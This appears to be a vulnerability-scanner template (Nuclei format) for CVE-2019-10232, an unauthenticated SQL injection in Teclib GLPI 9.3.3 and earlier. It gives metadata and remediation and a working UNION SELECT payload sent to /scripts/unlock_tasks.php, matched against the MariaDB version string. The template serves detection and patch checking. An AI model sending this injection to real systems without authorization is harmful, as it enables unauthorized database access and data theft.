id: CVE-2019-10232

info:
  name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
  author: RedTeamBrasil
  severity: critical
  description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user-controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantics of the original SQL query and retrieve database records.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability.
  reference:
    - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
    - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10232
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10232
    cwe-id: CWE-89
    epss-score: 0.12149
    epss-percentile: 0.95246
    cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: teclib-edition
    product: gestionnaire_libre_de_parc_informatique
  tags: cve,cve2019,glpi,sqli,injection,teclib-edition

http:
  - method: GET
    path:
      - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
      - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "-MariaDB-"
          - "Start unlock script"
        condition: and

    extractors:
      - type: regex
        regex:
          - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
        part: body
# digest: 4b0a00483046022100efff10a9f7ef07b0c26cf059ac132ff1bd1afdac52ce651b2e0b519e4207debd022100c1d21956a12aac1e196d8bc9e988ecff71dd81575e68f0572017946fccef80b2:922c64590222798bb761d5b6d8e72950